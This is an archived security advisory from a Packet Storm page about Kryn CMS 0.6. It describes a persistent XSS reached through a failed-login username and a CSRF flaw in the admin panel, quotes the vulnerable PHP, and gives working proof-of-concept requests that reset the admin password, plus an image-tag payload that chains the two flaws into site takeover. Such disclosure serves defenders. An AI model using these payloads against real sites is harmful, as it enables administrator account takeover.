what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Kryn CMS 0.6 Cross Site Request Forgery / Cross Site Scripting

Kryn CMS 0.6 Cross Site Request Forgery / Cross Site Scripting
Posted Jun 30, 2010
Authored by TurboBorland

Kryn CMS versions 0.6 and below suffer from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | 8f39e646cf65c1302c582fc3983c6589dee8cb7e23fe678fb1f237a1ab4e5700

Kryn CMS 0.6 Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
Found By:    TurboBorland
Email Address: tborland1@gmail.com
Software: Kryn <=0.6
Date Found: 06/21/2010
Date Submitted: 06/29/2010
Ethical Disclosure: Vendor submitted - Replied with fix: "We've fix
this issues and already uploaded the new versions for kryn-core and
usermanagement." - Submission to bugtraq.
Vulnerabilities: Persistent XSS & Administrative information change for CSRF
Site: http://www.kryn.org/
Download: http://download.kryn.org/?dp=kryn-package-basic-0.6.zip

Kryn CMS has multiple vulnerabilities. This includes the ability to
immediately own the site based off of a failed login in the
administrative login.

The vulnerable code, included in:
kryn/User.class.php
line 96
klog('authentication', str_replace("%s", $_REQUEST['username'],
"SECURITY Login failed for '%s' to administration"));

This is the overview section of the administrative login, which is the
entry to several administrative tasks. This will permanently store the
injection in both the failed logins and the "logs", which will execute
automatically upon viewing.


The next vulnerability is a CSRF. No action in the administrative
panel has a random token, nonce, to verify an action. Through this,
the PoC shown has the ability to change admin information:

http://site.org/admin/backend/window/loadClass/saveItem?noCache=1277145391050&rsn=1&username=admin&passwd=admin&email=suck2%40blahman.com&groups=[%221%22]&module=users&code=users%2FeditMe%2F
Vulnerable Code:
inc/modules/users/
usersAdminEdit.class.php
<?php


class usersAdminEdit extends windowEdit {

public $table = 'system_user';
public $checkUsage = true; //default on

public $primary = array('rsn');

function __construct(){
$rsn = getArgv('rsn')+0;


if(!kryn::checkUrlAccess('admin/users/users/editMe/')){

}
}

public $fields = array(
'username' => array(
'label' => 'Username',
'desc' => 'Also the administration login',
'type' => 'text',
'empty' => false
),
'email' => array(
'label' => 'Email',
'type' => 'text',
'empty' => false
),
'passwd' => array(
'label' => 'Password',
'desc' => 'Let it empty to change nothing',
'type' => 'password',
'startempty' => true,
'onlyIfFilled' => true,
'modifier' => 'toPasswd'
),
'adminLanguage' => array(
'label' => 'Admin Language',
'type' => 'select',
'sql' => 'SELECT * FROM %pfx%system_langs',
'table_key' => 'code',
'table_label' => 'title',
'customSave' => 'saveLanguage',
'customValue' => 'getLanguage',
),
'userBg' => array(
'label' => 'Desktop background image',
'type' => 'fileChooser',
'customSave' => 'saveUserBg',
'customValue' => 'userBgValue',
),
'groups' => array(
'label' => 'Groups',
'type' => 'select',
'table' => 'system_groupaccess',
//TODO geht so nicht,aber so vllt:
'relation' => 'n-n',
'n-n' => array(
'right' => 'system_groups',
'right_key' => 'rsn',
'right_label' => 'name',
'middle' => 'system_groupaccess',
'middle_keyright' => 'group_rsn',
'middle_keyleft' => 'user_rsn',
'left_key' => 'rsn'
),
'size' => 6,
'multiple' => 1,
'fake' => true //'group' will not be used in update
)
);

public function userBgValue($pPrimary, $pItem){
$rsn = $pPrimary['rsn'];
$user = dbTableFetch('system_user', 1, "rsn = $rsn");
$settings = unserialize($user['settings']);
return $settings['userBg'];
}

public function saveUserBg(){
global $user;

$cacheCode = "user_".(getArgv('rsn')+0);
kryn::removePhpCache($cacheCode);

$user = dbTableFetch('system_user', 1, "rsn = ".(getArgv('rsn')+0));
$settings = unserialize( $user['settings'] );
$settings['userBg'] = getArgv('userBg', 1);
$settings = serialize( $settings );

dbUpdate( 'system_user', array('rsn' => getArgv('rsn')+0),
array('settings' => $settings) );
}

public function saveLanguage(){

$user = dbTableFetch('system_user', 1, "rsn = ".(getArgv('rsn')+0));
$settings = unserialize( $user['settings'] );
$settings['adminLanguage'] = getArgv('adminLanguage');
$settings = serialize( $settings );

dbUpdate( 'system_user', array('rsn' => getArgv('rsn')+0),
array('settings' => $settings) );
}

public function getLanguage( $pPrimary, $pItem ){
$rsn = $pPrimary['rsn'];
$user = dbTableFetch('system_user', 1, "rsn = $rsn");
$settings = unserialize($user['settings']);
return $settings['adminLanguage'];
}

public function toPasswd( $pPw ){
return md5($pPw);
}

}

No nonce checking for any field in submission. POST used, but not required.


+++Vulnerability Impact: Through this, our injection will modify
whatever we feel like for whatever user:

<img src="http://site.org/admin/backend/window/loadClass/saveItem?noCache=1277145391050&rsn=1&username=admin&passwd=admin&email=test%40blahman.com&groups=[%221%22]&module=users&code=users%2FeditMe%2F"/>
No bounds checking (even if added, we can point a script src= to a
script and still inject), will inject this CSRF into the page as
persistant XSS, and once admin logs in and looks at overview,
immediate (can be made quieter) control can be had.
Virtual file manager already included, so no need for shell. ;)

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close